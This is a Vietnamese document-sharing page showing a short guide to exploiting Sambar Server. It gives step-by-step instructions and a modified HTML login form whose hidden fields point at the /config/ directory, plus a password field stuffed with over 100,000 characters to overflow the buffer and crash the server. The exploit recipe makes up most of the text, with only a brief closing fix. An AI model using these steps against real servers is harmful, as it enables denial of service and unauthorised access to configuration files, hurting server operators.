Tải bản đầy đủ (.doc) (2 trang)
  1. Trang chủ
    2. >>
  2. Công Nghệ Thông Tin
    3. >>
  3. An ninh - Bảo mật

Lỗi tràn bộ đệm của Server Sambar

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (35.32 KB, 2 trang )

Lỗi tràn bộ đệm của Server Sambar :
trang này đã được đọc lần
CÁCH KHAI THÁC:
Bạn phải biết được đường dẫn (ở sambar là c:\sambar ) của form đăng nhập sysuser:
BƯỚC 1: đi tới đường dẫn của form đăng nhập sysuser, như
http://localhost/sysuser/index.stm.
BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và rename
thành something.html .
BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này cho
form và images , tất nhiên, form phải được connect đến đúng địa chỉ url của script server.
CODE
[FORM METHOD=POST ACTION="http://localhost/session/login"
onsubmit="return FormValidator(this)"]
[INPUT TYPE=hidden NAME="RCpage"
VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation.
[INPUT TYPE=hidden NAME="onfailure"
VALUE="http://localhost/sysuser/relogin.stm"]*bạn có thể thay đổi cái này để làm tăng việc tràn
bộ đệm giống như một script cgi (cái này có thể là tấn công bằng DoS)
[INPUT TYPE=hidden NAME="start" VALUE=1>
[INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"]
[INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"]
[INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"]
[INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"]
[INPUT TYPE=hidden NAME="RCScount" VALUE="25]
[INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"]
[INPUT TYPE=hidden NAME="RCSpath" VALUE="/]
[INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *Đây là vấn đề*
[INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*Đây là vấn đề*
[INPUT TYPE=hidden NAME="RCSsortby" VALUE="name]
BƯỚC 4: bây giờ bạn có thể refresh và login, dùng một user và password hợp lệ nếu bạn muốn
chứng tỏ một lỗi nữa ở bước 6!


BƯỚC 5: bây bạn phải nhấn submit, chờ, và nếu bạn chạy server trên máy của bạn thì server se
trở nên dễ bị đổ, nếu bạn tiếp tục send thì server phải restart hoặc máy của bạn restart trong
suốt quá trình tấn công!.
BƯỚC 6: lỗi thứ hai là tràn bộ đệm ở vùng mật khẩu, bạn có thể chèn vào hơn 1 triệu ký tự và
submit nó nhưng phải edit đoạn mã này trên máy của bạn:
CODE
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< thay đổi cái này
thành...
[INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="đặt text của bạn ở đây, nhớ là hơn 100000
ký tự"]
và..........
BƯỚC 7: nhấn submit và server... !
GIẢI PHÁP:
- Thay đổi đường dẫn và thư mục của file liên quan đến user ở server sambar!
- Những người phát triển server sambar có thể thay đổi code va phát triển một module để kiểm
tra việc đi lại các file của user và bộ đệm của form transfer ở chế độ POST hay GET.

Tài liệu liên quan

Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×